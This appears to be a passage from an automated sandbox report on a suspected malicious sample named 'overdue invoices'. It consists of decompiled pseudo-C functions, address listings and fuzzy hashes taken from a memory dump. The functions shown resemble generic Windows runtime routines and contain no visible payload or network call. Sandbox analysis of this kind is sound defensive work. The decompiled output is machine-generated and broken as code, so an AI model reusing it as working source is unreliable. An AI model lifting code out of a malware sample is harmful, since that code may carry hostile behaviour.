											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E009D13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L009B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = L009D9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                  0x0099c608
                  0x0099c615
                  0x0099c625
                  0x0099c62d
                  0x0099c635
                  0x0099c640
                  0x0099c680
                  0x0099c687
                  0x0099c688
                  0x0099c689
                  0x0099c694
                  0x0099c694
                  0x0099c642
                  0x0099c64a
                  0x0099c697
                  0x00a07a25
                  0x00a07a2b
                  0x00a07a2e
                  0x00a07a30
                  0x00a07bea
                  0x00a07bea
                  0x00000000
                  0x00a07bea
                  0x00a07a36
                  0x00a07a43
                  0x00a07a48
                  0x00a07a4c
                  0x00a07a4e
                  0x00000000
                  0x00000000
                  0x00a07a58
                  0x00a07a5a
                  0x00a07a5b
                  0x00a07a5c
                  0x00a07a5d
                  0x00a07a63
                  0x00a07a64
                  0x00a07a6a
                  0x00a07a6c
                  0x00a07a6e
                  0x00a079cb
                  0x00a079cb
                  0x00a079ce
                  0x00a079d0
                  0x00a07a98
                  0x00a07a9b
                  0x00a07a9b
                  0x00a07a9e
                  0x00a07aa1
                  0x00a07bbe
                  0x00a07bbe
                  0x00a07bc0
                  0x00a07be0
                  0x00a07be0
                  0x00a07a01
                  0x00a07a01
                  0x00a07a05
                  0x00a07a07
                  0x00a07a15
                  0x00a07a15
                  0x00a07a1a
                  0x00000000
                  0x00a07a1a
                  0x00a07bc2
                  0x00a07bc6
                  0x00a07bc9
                  0x00a07bcd
                  0x00a07bcf
                  0x00a079e6
                  0x00a079e6
                  0x00a079eb
                  0x00a079eb
                  0x00a079ef
                  0x00a079f1
                  0x00000000
                  0x00000000
                  0x00a079f3
                  0x00a079f5
                  0x00a079ff
                  0x00a079ff
                  0x00000000
                  0x00a079ff
                  0x00a079f7
                  0x00a079fd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a079fd
                  0x00a07bd5
                  0x00a07bd8
                  0x00000000
                  0x00000000
                  0x00a07ba9
                  0x00a07bac
                  0x00a07bb0
                  0x00a07bb1
                  0x00a07bb1
                  0x00a07bb6
                  0x00000000
                  0x00a07bb6
                  0x00a07aa7
                  0x00a07aaa
                  0x00000000
                  0x00000000
                  0x00a07ab2
                  0x00a07ab3
                  0x00a07ab5
                  0x00a07aec
                  0x00a07aef
                  0x00a07b25
                  0x00a07b28
                  0x00a07b62
                  0x00a07b64
                  0x00a07b8f
                  0x00a07b92
                  0x00a07b96
                  0x00a07b98
                  0x00000000
                  0x00000000
                  0x00a07b9e
                  0x00a07b9f
                  0x00a07ba3
                  0x00000000
                  0x00a07ba3
                  0x00a07b66
                  0x00a07b68
                  0x00a07ae2
                  0x00a07ae2
                  0x00000000
                  0x00a07ae2
                  0x00a07b6e
                  0x00a07b72
                  0x00a07b75
                  0x00a07b81
                  0x00a07b85
                  0x00a07b87
                  0x00000000
                  0x00000000
                  0x00a07b31
                  0x00a07b34
                  0x00a07b3c
                  0x00a07b45
                  0x00a07b46
                  0x00a07b4f
                  0x00a07b51
                  0x00a07b57
                  0x00a07b59
                  0x00a07b59
                  0x00000000
                  0x00a07b59
                  0x00a07b77
                  0x00000000
                  0x00a07b77
                  0x00a07b2a
                  0x00000000
                  0x00a07b2a
                  0x00a07af1
                  0x00a07af3
                  0x00000000
                  0x00000000
                  0x00a07afb
                  0x00a07afc
                  0x00a07afe
                  0x00000000
                  0x00000000
                  0x00a07b00
                  0x00a07b03
                  0x00000000
                  0x00000000
                  0x00a07b05
                  0x00a07b09
                  0x00a07b0d
                  0x00a07b0f
                  0x00000000
                  0x00000000
                  0x00a07b18
                  0x00a07b1d
                  0x00000000
                  0x00a07b1d
                  0x00a07ab7
                  0x00a07ab9
                  0x00000000
                  0x00000000
                  0x00a07abf
                  0x00a07ac1
                  0x00000000
                  0x00000000
                  0x00a07ac3
                  0x00a07ac6
                  0x00000000
                  0x00000000
                  0x00a07ac8
                  0x00a07acc
                  0x00a07ad0
                  0x00a07ad2
                  0x00000000
                  0x00000000
                  0x00a07adb
                  0x00000000
                  0x00a07adb
                  0x00a079d6
                  0x00a079d9
                  0x00a079dc
                  0x00a07a91
                  0x00a07a94
                  0x00000000
                  0x00a07a94
                  0x00a079e2
                  0x00000000
                  0x00a079e2
                  0x00a07a74
                  0x00a07a7a
                  0x00000000
                  0x00000000
                  0x00a07a8a
                  0x00a07a21
                  0x00a07a21
                  0x00000000
                  0x00a07a21
                  0x0099c650
                  0x0099c651
                  0x0099c656
                  0x0099c65c
                  0x0099c65d
                  0x0099c663
                  0x0099c664
                  0x0099c66a
                  0x0099c66e
                  0x00a079c5
                  0x00a079c7
                  0x00000000
                  0x00a079c7
                  0x0099c67a
                  0x00000000
                  0x00000000
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c329cba9848db6b297f42291076ce4f7e5c6aec852ae83704b74ed1c1d1f73ca
                  • Instruction ID: 3a1c1cc950e5aa6269b3cb457d4a13e13225055d1a36c6f17d50764bc7b3983f
                  • Opcode Fuzzy Hash: c329cba9848db6b297f42291076ce4f7e5c6aec852ae83704b74ed1c1d1f73ca
                  • Instruction Fuzzy Hash: 81819275A482099FCB25CF14D891B7E73A5FB94390F64481AFD469B281D330FD41CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A2B8D0 Relevance: .2, Instructions: 199COMMON
                  Download Yara Rule
                  C-Code - Quality: 39%
                  			E00A2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0xa87b9c; // 0x0
				_t124 = L009B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E009D9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E009D95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E009D95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L009B77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E009D9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E009D95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0xa87b9c; // 0x0
									_t92 = L009B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E009D9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L0099A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L00A2E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L00A2E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E009D95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                  0x00a2b8d9
                  0x00a2b8e4
                  0x00000000
                  0x00a2b8e6
                  0x00a2b8f3
                  0x00a2b8f5
                  0x00a2b8f5
                  0x00a2b8f8
                  0x00a2b920
                  0x00a2b924
                  0x00a2b936
                  0x00a2b939
                  0x00a2b93d
                  0x00a2b948
                  0x00a2b9a0
                  0x00a2b9a0
                  0x00a2b9a4
                  0x00a2b9bf
                  0x00a2b9c4
                  0x00a2b9c6
                  0x00a2b9cd
                  0x00a2b9d1
                  0x00a2bad4
                  0x00a2bad8
                  0x00a2bada
                  0x00a2badc
                  0x00a2badc
                  0x00a2badf
                  0x00a2bae0
                  0x00a2bae2
                  0x00a2bae4
                  0x00a2baec
                  0x00a2baee
                  0x00a2baf0
                  0x00a2baf0
                  0x00a2baec
                  0x00a2bafb
                  0x00a2bafc
                  0x00a2bafe
                  0x00a2bb01
                  0x00a2bb01
                  0x00000000
                  0x00a2bb06
                  0x00a2b9d7
                  0x00a2b9db
                  0x00a2b9db
                  0x00a2b9de
                  0x00a2b9de
                  0x00a2b9e4
                  0x00a2b9e7
                  0x00a2b9ea
                  0x00a2b9ec
                  0x00a2b9ef
                  0x00a2b9f3
                  0x00a2ba1b
                  0x00a2ba1b
                  0x00a2ba23
                  0x00a2ba24
                  0x00a2ba27
                  0x00a2ba2a
                  0x00a2ba2b
                  0x00a2ba2e
                  0x00a2ba30
                  0x00a2ba37
                  0x00a2ba3f
                  0x00a2ba9c
                  0x00a2baa2
                  0x00a2bb13
                  0x00a2bb15
                  0x00a2baae
                  0x00a2baae
                  0x00a2bab3
                  0x00a2bab5
                  0x00a2baba
                  0x00a2bac8
                  0x00a2bac8
                  0x00a2baba
                  0x00a2bacd
                  0x00a2bacf
                  0x00000000
                  0x00a2bacf
                  0x00a2bb1a
                  0x00000000
                  0x00a2bb1c
                  0x00a2baa7
                  0x00a2bb11
                  0x00000000
                  0x00a2bb11
                  0x00a2baa9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a2ba41
                  0x00a2ba41
                  0x00a2ba41
                  0x00a2ba58
                  0x00a2ba5d
                  0x00a2ba62
                  0x00000000
                  0x00000000
                  0x00a2ba64
                  0x00a2ba67
                  0x00a2ba68
                  0x00a2ba69
                  0x00a2ba6c
                  0x00a2ba6f
                  0x00a2ba71
                  0x00a2ba78
                  0x00a2ba80
                  0x00000000
                  0x00000000
                  0x00a2ba90
                  0x00a2ba90
                  0x00a2ba97
                  0x00000000
                  0x00a2ba97
                  0x00a2b9f5
                  0x00a2b9f7
                  0x00a2b9f7
                  0x00a2b9fa
                  0x00a2ba03
                  0x00a2ba07
                  0x00a2ba0c
                  0x00a2ba10
                  0x00a2ba17
                  0x00000000
                  0x00a2b9f7
                  0x00a2b9a6
                  0x00a2b9a8
                  0x00a2b9af
                  0x00a2b9b3
                  0x00000000
                  0x00000000
                  0x00a2b9b9
                  0x00000000
                  0x00a2b9b9
                  0x00a2b94d
                  0x00a2b98f
                  0x00a2b995
                  0x00a2b999
                  0x00a2b960
                  0x00a2b967
                  0x00a2b968
                  0x00a2b96a
                  0x00000000
                  0x00a2b96a
                  0x00a2b99b
                  0x00a2b99e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a2b99e
                  0x00a2b951
                  0x00a2b954
                  0x00a2b95a
                  0x00a2b95e
                  0x00a2b972
                  0x00a2b979
                  0x00a2b97d
                  0x00a2b97f
                  0x00a2b980
                  0x00a2b982
                  0x00a2b984
                  0x00000000
                  0x00a2b984
                  0x00000000
                  0x00a2b926
                  0x00000000
                  0x00a2b926

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9da55c4bad3516bdb92b7cdd19515482b32e73412811347371e7e1ad2d699b04
                  • Instruction ID: 1f23fdb90c12d6c2db659221ec1d614cf5e6acf83735263351d53bb051ee312a
                  • Opcode Fuzzy Hash: 9da55c4bad3516bdb92b7cdd19515482b32e73412811347371e7e1ad2d699b04
                  • Instruction Fuzzy Hash: B0713F32250B11EFDB31DF18D941F66B7B5EB80720F248938F6558B6A1DB71E980CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A16DC9 Relevance: .2, Instructions: 199COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00A16DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E00A16B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E009B7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E009D9AE0();
					_t87 = L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E00A1795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E00A1795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E00A1795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E00A1795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L009B4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E00A16B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E00A16B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E00A16B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E00A16B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E009B7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E009D9AE0();
								L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L009B2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L009B2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L009B2400( &_v52);
							}
							if(_v28 >= 0) {
								return L009B2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                  0x00a16dd4
                  0x00a16dde
                  0x00a16de1
                  0x00a16de3
                  0x00a16de6
                  0x00a16de9
                  0x00a16dec
                  0x00a16def
                  0x00a16df2
                  0x00a16df5
                  0x00a16dfe
                  0x00a16e04
                  0x00a16e09
                  0x00a16e0d
                  0x00a16e18
                  0x00a16e1b
                  0x00a16e22
                  0x00a16e2d
                  0x00a16e30
                  0x00a16e36
                  0x00a16e42
                  0x00a16e4d
                  0x00a16e50
                  0x00a16e55
                  0x00a16e5c
                  0x00a16e6e
                  0x00a16e5e
                  0x00a16e67
                  0x00a16e67
                  0x00a16e73
                  0x00a16e74
                  0x00a16e77
                  0x00a16e7c
                  0x00a16e7d
                  0x00a16e8e
                  0x00a16e93
                  0x00a16e9c
                  0x00a16ea8
                  0x00a16eab
                  0x00a16eac
                  0x00a16eb3
                  0x00a16ecd
                  0x00a16edc
                  0x00a16ee2
                  0x00a16ee5
                  0x00a16ef2
                  0x00a16efb
                  0x00a16f01
                  0x00a16f06
                  0x00a16f0b
                  0x00a16f11
                  0x00a16f1a
                  0x00a16f22
                  0x00a16f26
                  0x00a16f26
                  0x00a16f33
                  0x00a16f41
                  0x00a16f44
                  0x00a16f47
                  0x00a16f54
                  0x00a16f65
                  0x00a16f77
                  0x00a16f7c
                  0x00a16f82
                  0x00a16f91
                  0x00a16f99
                  0x00a16fa3
                  0x00a16fae
                  0x00a16fae
                  0x00a16fba
                  0x00a16fbb
                  0x00a16fbc
                  0x00a16fc1
                  0x00a16fc2
                  0x00a16fd3
                  0x00a16fd8
                  0x00a16fd8
                  0x00a16fdf
                  0x00a16fe8
                  0x00a16fee
                  0x00a16fee
                  0x00a16ff5
                  0x00a16ffb
                  0x00a16ffb
                  0x00a17004
                  0x00000000
                  0x00a1700a
                  0x00a17004
                  0x00a16eb3
                  0x00a16e9c
                  0x00a17015

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                  • Instruction ID: fb8e53633901392b5e8494810909b1ebd9c2dd63a593a5ae3517c0ae2d6d03df
                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                  • Instruction Fuzzy Hash: 57716E71E00219EFCB10DFA5CA85AEEBBB9FF88710F104569E505E7251DB34AE41CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009952A5 Relevance: .2, Instructions: 161COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E009952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E009AEEF0(0xa879a0);
					_t104 =  *0xa88210; // 0x532ca8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E009AEB70(_t93, 0xa879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E009D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E009AEEF0(0xa879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E009AEB70(0, 0xa879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x532cb5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E009CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E009AEEF0(0xa879a0);
									__eflags =  *0xa88210 - _t104; // 0x532ca8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xa88210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00A14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E009AEB70(_t95, 0xa879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E009D95D0();
											L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E009D95D0();
											L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E009AEB70(_t93, 0xa879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E009D95D0();
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E009D95D0();
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E009CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                  0x009952a5
                  0x009952ad
                  0x009952b0
                  0x009952b3
                  0x009952b7
                  0x009952ba
                  0x009952bf
                  0x009952c4
                  0x009952cc
                  0x00000000
                  0x00000000
                  0x009952ce
                  0x009952d9
